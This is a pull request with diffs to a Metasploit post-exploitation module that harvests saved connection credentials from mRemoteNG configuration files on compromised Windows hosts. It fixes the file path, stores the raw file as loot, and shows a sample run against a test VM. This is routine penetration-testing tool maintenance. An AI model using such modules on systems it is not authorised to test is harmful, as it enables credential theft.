### PR TITLE
fix pathing in mremoteng

### DIFF
--- a/modules/post/windows/gather/credentials/mremote.rb
+++ b/modules/post/windows/gather/credentials/mremote.rb
@@ -50,9 +50,9 @@ class MetasploitModule < Msf::Post
     begin
       if file_exist?(path)
         condata = read_file(path)
-	loot_path = store_loot('confCons.xml', 'text/plain', session, condata)
-	vprint_good("confCons.xml saved to #{loot_path}")
-	parse_xml(condata)
+        loot_path = store_loot('confCons.xml', 'text/plain', session, condata)
+        vprint_good("confCons.xml saved to #{loot_path}")
+        parse_xml(condata)
         print_status("Finished processing #{path}")
       end
     rescue Rex::Post::Meterpreter::RequestError

--- a/modules/post/windows/gather/credentials/mremote.rb
+++ b/modules/post/windows/gather/credentials/mremote.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Post
     grab_user_profiles().each do |user|
       next if user['LocalAppData'] == nil
       tmpath  = user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'
-      ng_path = user['LocalAppData'] + '\\..\\Roaming\\mRemoteNG\\confCons.xml'
+      ng_path = user['AppData'] + '\\mRemoteNG\\confCons.xml'
       get_xml(tmpath)
       get_xml(ng_path)
     end
@@ -50,7 +50,9 @@ class MetasploitModule < Msf::Post
     begin
       if file_exist?(path)
         condata = read_file(path)
-        parse_xml(condata)
+	loot_path = store_loot('confCons.xml', 'text/plain', session, condata)
+	vprint_good("confCons.xml saved to #{loot_path}")
+	parse_xml(condata)
         print_status("Finished processing #{path}")
       end
     rescue Rex::Post::Meterpreter::RequestError

--- a/modules/post/windows/gather/credentials/mremote.rb
+++ b/modules/post/windows/gather/credentials/mremote.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
     begin
       if file_exist?(path)
         condata = read_file(path)
-        loot_path = store_loot('confCons.xml', 'text/plain', session, condata)
+        loot_path = store_loot('confCons.xml', 'text/xml', session, condata)
         vprint_good("confCons.xml saved to #{loot_path}")
         parse_xml(condata)
         print_status("Finished processing #{path}")


### PR DESCRIPTION
Fixes #10503 
Instead of using local app data, then traversing back one, just use the appdata (roaming) variable.
Also store loot because if things go bad (as they did) at least you have the raw file.

There seems to be an additional bug with the decryption routine, but this is simply to address the one problem.

@Clickbaitcake please give it a test.

## Verification

- [ ] get a shell on a box with mRemoteNG
- [ ] `use post/windows/gather/credentials/mremote`
- [ ] set session and verbose
- [ ] **Verify** it finds the files


Example run where the decrypt routine bugs, but the original problem is fixed against windows 8.1 and the latest mremoteng .

```
msf5 post(windows/gather/credentials/mremote) > run

[*] Looking for C:\Users\IEUser\AppData\Local\Felix_Deimel\mRemote\confCons.xml
[*] Looking for C:\Users\IEUser\AppData\Roaming\mRemoteNG\confCons.xml
[+] confCons.xml saved to /root/.msf4/loot/20180909205907_default_1.1.2.1_confCons.xml_275526.txt
[-] Post failed: OpenSSL::Cipher::CipherError wrong final block length
[-] Call stack:
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:126:in `final'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:126:in `decrypt'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:79:in `block in parse_xml'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:67:in `each'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:67:in `parse_xml'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:55:in `get_xml'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:44:in `block in run'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:39:in `each'
[-]   /metasploit-framework/modules/post/windows/gather/credentials/mremote.rb:39:in `run'
[*] Post module execution completed
```